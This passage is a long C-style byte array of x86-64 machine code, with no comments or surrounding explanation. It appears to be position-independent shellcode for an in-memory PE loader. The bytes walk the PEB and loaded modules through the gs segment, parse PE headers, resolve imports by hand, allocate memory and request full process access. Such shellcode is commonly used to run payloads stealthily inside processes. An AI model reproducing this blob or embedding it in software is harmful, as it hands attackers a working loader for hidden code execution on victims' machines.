1383 0x00, 0x85, 0xc0, 0x75, 0x45, 0x8b, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x83,
1384 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1385 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0,
1386 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf0,
1387 0x03, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b,
1388 0x45, 0x70, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xb0, 0x04, 0x00, 0x00,
1389 0xeb, 0x14, 0x83, 0xad, 0xa8, 0x04, 0x00, 0x00, 0x01, 0x83, 0xbd, 0xa8,
1390 0x04, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x57, 0xff, 0xff, 0xff, 0x48, 0x83,
1391 0xbd, 0xb0, 0x04, 0x00, 0x00, 0x00, 0x0f, 0x84, 0xe9, 0x01, 0x00, 0x00,
1392 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c, 0x04,
1393 0x00, 0x00, 0x84, 0xc0, 0x74, 0x6f, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00,
1394 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x26, 0x48,
1395 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00,
1396 0x48, 0x8d, 0x95, 0xa0, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1397 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05, 0x00, 0x00, 0xe8, 0xd8, 0xc9, 0xff,
1398 0xff, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x8b, 0x80, 0x0c, 0x05,
1399 0x00, 0x00, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8d, 0x85, 0xa0, 0x00, 0x00,
1400 0x00, 0xeb, 0x0d, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x48, 0x05,
1401 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xb0, 0x04, 0x00, 0x00, 0x48,
1402 0x89, 0xc1, 0xff, 0xd2, 0xe9, 0x69, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1403 0xb0, 0x04, 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x04, 0x00, 0x00, 0x48,
1404 0x8b, 0x85, 0x98, 0x04, 0x00, 0x00, 0xff, 0xd0, 0xe9, 0x4d, 0x01, 0x00,
1405 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05, 0x00, 0x00, 0x0f, 0xb6, 0x80, 0x0c,
1406 0x04, 0x00, 0x00, 0x84, 0xc0, 0x74, 0x3c, 0x48, 0x8b, 0x85, 0x18, 0x05,
1407 0x00, 0x00, 0x48, 0x05, 0x0c, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xa0,
1408 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1409 0x10, 0x05, 0x00, 0x00, 0xe8, 0x4c, 0xc9, 0xff, 0xff, 0x48, 0x8d, 0x85,
1410 0xa0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x05,
1411 0x00, 0x00, 0xe8, 0x3b, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x18, 0x05,
1412 0x00, 0x00, 0x8b, 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00,
1413 0x00, 0x48, 0x8d, 0x85, 0xa8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90,
1414 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x58, 0x48, 0xc7, 0x44, 0x24,
1415 0x50, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00,
1416 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0x48,
1417 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30,
1418 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00, 0x00,
1419 0x00, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24,
1420 0x20, 0x49, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0x41, 0xb8, 0x00, 0x00,
1421 0x00, 0x00, 0xba, 0xff, 0xff, 0x1f, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x0b,
1422 0x2b, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54,
1423 0x04, 0x00, 0x00, 0x00, 0x78, 0x70, 0x48, 0x8b, 0x85, 0xa8, 0x02, 0x00,
1424 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41,
1425 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89,
1426 0xc1, 0xe8, 0xa5, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1427 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x79, 0x3d, 0xe9, 0xfa, 0x00,
1428 0x00, 0x00, 0xc7, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x30, 0x00, 0x00, 0x00,
1429 0x8b, 0x85, 0xc8, 0x03, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89,
1430 0x85, 0xc0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x03, 0x00, 0x00,
1431 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48,
1432 0x89, 0xc1, 0xff, 0xd2, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90, 0x48, 0x8b,
1433 0x45, 0x70, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xb5, 0x00, 0x00, 0x00, 0x48,
1434 0xc7, 0x45, 0x58, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x4d, 0x58, 0x48,
1435 0x8d, 0x85, 0xb8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00,
1436 0x00, 0x48, 0x89, 0x54, 0x24, 0x20, 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00,
1437 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff,
1438 0xff, 0xe8, 0xc1, 0x29, 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00,
1439 0x83, 0xbd, 0x54, 0x04, 0x00, 0x00, 0x00, 0x78, 0x6b, 0x48, 0x8b, 0x45,
1440 0x70, 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48,
1441 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6b, 0x28,
1442 0x00, 0x00, 0x89, 0x85, 0x54, 0x04, 0x00, 0x00, 0x83, 0xbd, 0x54, 0x04,
1443 0x00, 0x00, 0x00, 0x78, 0x42, 0x48, 0x8b, 0x85, 0x80, 0x00, 0x00, 0x00,
1444 0x48, 0x8b, 0x95, 0x90, 0x04, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x9a,
1445 0x28, 0x00, 0x00, 0xeb, 0x2b, 0x90, 0xeb, 0x28, 0x90, 0xeb, 0x25, 0x90,
1446 0xeb, 0x22, 0x90, 0xeb, 0x1f, 0x90, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
1447 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
1448 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
1449 0x48, 0x81, 0xc4, 0x70, 0x05, 0x00, 0x00, 0x5e, 0x5f, 0x5d, 0xc3, 0x55,
1450 0x48, 0x89, 0xe5, 0x48, 0x81, 0xec, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89,
1451 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05,
1452 0x44, 0x04, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x00,
1453 0x00, 0x00, 0x00, 0xeb, 0x20, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48,
1454 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4,
1455 0x48, 0x98, 0x88, 0x94, 0x05, 0x70, 0xff, 0xff, 0xff, 0x83, 0x45, 0xf4,
1456 0x01, 0x8b, 0x45, 0xf4, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48,
1457 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x1a, 0x8b, 0x45, 0xf4,
1458 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1459 0x00, 0x3c, 0x3b, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x7f, 0x7e, 0xb2, 0x83,
1460 0x7d, 0xf4, 0x00, 0x74, 0x3c, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0x48, 0x83,
1461 0xc0, 0x01, 0x48, 0x01, 0x45, 0xf8, 0x8b, 0x45, 0xf4, 0x48, 0x98, 0xc6,
1462 0x84, 0x05, 0x70, 0xff, 0xff, 0xff, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
1463 0x8d, 0x85, 0x70, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0xba, 0x21,
1464 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0x6e, 0xff, 0xff, 0xff, 0xb8, 0x01,
1465 0x00, 0x00, 0x00, 0xeb, 0x06, 0x90, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48,
1466 0x81, 0xc4, 0xb0, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1467 0x48, 0x83, 0xc4, 0x80, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1468 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x48,
1469 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8, 0x00,
1470 0x00, 0x00, 0x00, 0xeb, 0x73, 0x48, 0x8d, 0x4d, 0xc0, 0x48, 0x8b, 0x45,
1471 0x18, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7,
1472 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1473 0x30, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00,
1474 0x00, 0x48, 0x89, 0xc2, 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8,
1475 0x62, 0x28, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x79,
1476 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x45, 0xe0, 0x3d,
1477 0x00, 0x10, 0x00, 0x00, 0x75, 0x19, 0x8b, 0x45, 0xe8, 0x3d, 0x00, 0x00,
1478 0x02, 0x00, 0x75, 0x0f, 0x8b, 0x45, 0xe4, 0x83, 0xf8, 0x04, 0x75, 0x07,
1479 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb, 0x05, 0xb8, 0x00, 0x00, 0x00, 0x00,
1480 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x70, 0x01,
1481 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89,
1482 0x8d, 0x00, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0x08, 0x01, 0x00, 0x00,
1483 0xc7, 0x85, 0xac, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1484 0x3c, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x3c, 0x65, 0x48, 0x8b, 0x00,
1485 0x48, 0x89, 0x45, 0x30, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x8b, 0x40, 0x60,
1486 0x48, 0x89, 0x85, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x00,
1487 0x00, 0x00, 0x48, 0x8b, 0x40, 0x20, 0x48, 0x89, 0x85, 0x98, 0x00, 0x00,
1488 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x40,
1489 0x48, 0x8b, 0x95, 0x00, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc2, 0x1c, 0x03,
1490 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x90, 0x00,
1491 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
1492 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x00, 0x00, 0x00, 0x8b,
1493 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00,
1494 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
1495 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x50, 0x18, 0x48, 0x8b, 0x85,
1496 0x80, 0x00, 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xc0, 0x48,
1497 0x01, 0xd0, 0x48, 0x89, 0x45, 0x78, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00,
1498 0x00, 0x00, 0x00, 0x00, 0xe9, 0x9a, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec,
1499 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01,
1500 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78,
1501 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1502 0x48, 0x05, 0x14, 0x03, 0x00, 0x00, 0x8b, 0x00, 0x39, 0xc2, 0x75, 0x60,
1503 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89, 0xd0, 0x48, 0xc1, 0xe0,
1504 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03, 0x48, 0x89, 0xc2, 0x48,
1505 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48,
1506 0x8b, 0x85, 0x90, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85,
1507 0xe0, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x89,
1508 0xd0, 0x48, 0xc1, 0xe0, 0x02, 0x48, 0x01, 0xd0, 0x48, 0xc1, 0xe0, 0x03,
1509 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0x78, 0x48, 0x01, 0xd0, 0x8b, 0x40,
1510 0x08, 0xc1, 0xe8, 0x03, 0x89, 0x85, 0xe8, 0x00, 0x00, 0x00, 0xeb, 0x21,
1511 0x83, 0x85, 0xec, 0x00, 0x00, 0x00, 0x01, 0x48, 0x8b, 0x85, 0x80, 0x00,
1512 0x00, 0x00, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x85, 0xec,
1513 0x00, 0x00, 0x00, 0x0f, 0x82, 0x4c, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85,
1514 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0xff,
1515 0xd0, 0x48, 0x89, 0x45, 0x70, 0xc7, 0x85, 0xec, 0x00, 0x00, 0x00, 0x00,
1516 0x00, 0x00, 0x00, 0xeb, 0x5c, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48,
1517 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00,
1518 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd8, 0x00, 0x00, 0x00,
1519 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x08, 0x48,
1520 0x39, 0x45, 0x70, 0x75, 0x24, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00,
1521 0x4c, 0x8b, 0x80, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x01,
1522 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1523 0x41, 0xff, 0xd0, 0xeb, 0x16, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00, 0x00,
1524 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00, 0x00,
1525 0x00, 0x72, 0x96, 0x48, 0x8b, 0x85, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8b,
1526 0x80, 0x98, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0x45, 0x68, 0xc7,
1527 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x84, 0x00,
1528 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5,
1529 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48,
1530 0x01, 0xd0, 0x48, 0x89, 0x45, 0x60, 0x48, 0x8b, 0x45, 0x60, 0x48, 0x8b,
1531 0x40, 0x08, 0x48, 0x39, 0x45, 0x68, 0x75, 0x52, 0x48, 0x8b, 0x85, 0x00,
1532 0x01, 0x00, 0x00, 0x4c, 0x8b, 0x88, 0xa8, 0x01, 0x00, 0x00, 0x48, 0x8b,
1533 0x95, 0xd8, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x20, 0x41, 0xb8, 0x01,
1534 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x8b, 0x85, 0xec,
1535 0x00, 0x00, 0x00, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
1536 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8d,
1537 0x45, 0x20, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8,
1538 0xd0, 0x1c, 0x00, 0x00, 0xeb, 0x1a, 0x90, 0x83, 0x85, 0xec, 0x00, 0x00,
1539 0x00, 0x01, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x3b, 0x85, 0xe8, 0x00,
1540 0x00, 0x00, 0x0f, 0x82, 0x6a, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xa0,
1541 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0x58, 0x48,
1542 0x8b, 0x45, 0x58, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x85, 0xd0, 0x00,
1543 0x00, 0x00, 0xe9, 0x33, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x00, 0x01,
1544 0x00, 0x00, 0x48, 0x05, 0x44, 0x03, 0x00, 0x00, 0x48, 0x89, 0x85, 0xb8,
1545 0x00, 0x00, 0x00, 0xc7, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
1546 0x00, 0xc7, 0x85, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc7,
1547 0x85, 0xec, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x66, 0x8b,
1548 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00,
1549 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x77, 0x75, 0x0a, 0xc7, 0x85,
1550 0xb0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00,
1551 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0,
1552 0x0f, 0xb6, 0x00, 0x3c, 0x70, 0x75, 0x0a, 0xc7, 0x85, 0xb4, 0x00, 0x00,
1553 0x00, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1554 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10,
1555 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85,
1556 0xec, 0x00, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48,
1557 0x8b, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1558 0x84, 0xc0, 0x74, 0x24, 0x8b, 0x95, 0xec, 0x00, 0x00, 0x00, 0x48, 0x8b,
1559 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c,
1560 0x3b, 0x74, 0x0d, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x7f, 0x0f, 0x86,
1561 0x5f, 0xff, 0xff, 0xff, 0x83, 0xbd, 0xec, 0x00, 0x00, 0x00, 0x00, 0x0f,
1562 0x84, 0x3f, 0x01, 0x00, 0x00, 0x8b, 0x85, 0xec, 0x00, 0x00, 0x00, 0x83,
1563 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x8b,
1564 0x85, 0xec, 0x00, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b,
1565 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55,
1566 0xa0, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd0, 0x48, 0x89,
1567 0xc2, 0x48, 0x8b, 0x8d, 0x00, 0x01, 0x00, 0x00, 0xe8, 0x2d, 0xc3, 0xff,
1568 0xff, 0x48, 0x89, 0x45, 0x50, 0x48, 0x83, 0x7d, 0x50, 0x00, 0x0f, 0x84,
1569 0xe6, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xb0, 0x00, 0x00, 0x00, 0x00, 0x74,
1570 0x6b, 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00,
1571 0x83, 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45,
1572 0x50, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8b, 0x45, 0x40, 0xff, 0xd0, 0x48,
1573 0x89, 0x85, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc8, 0x00, 0x00,
1574 0x00, 0x00, 0x0f, 0x84, 0x9f, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc8,
1575 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d,
1576 0x00, 0x01, 0x00, 0x00, 0xe8, 0xd7, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f,
1577 0x84, 0x7e, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x55, 0x28, 0x48, 0x8b, 0x85,
1578 0xc8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0xe9, 0x6b, 0xfe, 0xff, 0xff,
1579 0x48, 0x8b, 0x45, 0x50, 0x48, 0x89, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x83,
1580 0xbd, 0xb4, 0x00, 0x00, 0x00, 0x00, 0x74, 0x15, 0x48, 0x8b, 0x45, 0x50,
1581 0x48, 0x89, 0x45, 0x48, 0x48, 0x8b, 0x45, 0x48, 0xff, 0xd0, 0x48, 0x89,
1582 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x83, 0xbd, 0xc0, 0x00, 0x00, 0x00,
1583 0x00, 0x0f, 0x84, 0x34, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xc0, 0x00,
1584 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x00,
1585 0x01, 0x00, 0x00, 0xe8, 0x6c, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1586 0x13, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x85, 0xd8, 0x00, 0x00, 0x00, 0x48,
1587 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89,
1588 0x10, 0xe9, 0xf9, 0xfd, 0xff, 0xff, 0x90, 0xe9, 0xf3, 0xfd, 0xff, 0xff,
1589 0x90, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48,
1590 0x89, 0x85, 0xd0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x00, 0x00,
1591 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x0f, 0x85, 0xb9, 0xfd,
1592 0xff, 0xff, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x70, 0x01,
1593 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x80, 0x04, 0x00, 0x00,
1594 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0x10,
1595 0x04, 0x00, 0x00, 0x48, 0x89, 0x95, 0x18, 0x04, 0x00, 0x00, 0x48, 0x8b,
1596 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1597 0x48, 0x89, 0x85, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04,
1598 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48, 0x83, 0xc0,
1599 0x01, 0x48, 0x01, 0xc0, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x4d, 0xd8,
1600 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xf8, 0x03,
1601 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x04,
1602 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x30, 0x00, 0x00, 0x49,
1603 0x89, 0xc9, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48,
1604 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xc8, 0x21, 0x00, 0x00, 0x89,
1605 0x85, 0xf4, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf4, 0x03, 0x00, 0x00, 0x00,
1606 0x0f, 0x88, 0xe4, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00,
1607 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x95, 0x18, 0x04, 0x00, 0x00,
1608 0x8b, 0x92, 0x24, 0x05, 0x00, 0x00, 0x01, 0xd2, 0x41, 0x89, 0xd0, 0x48,
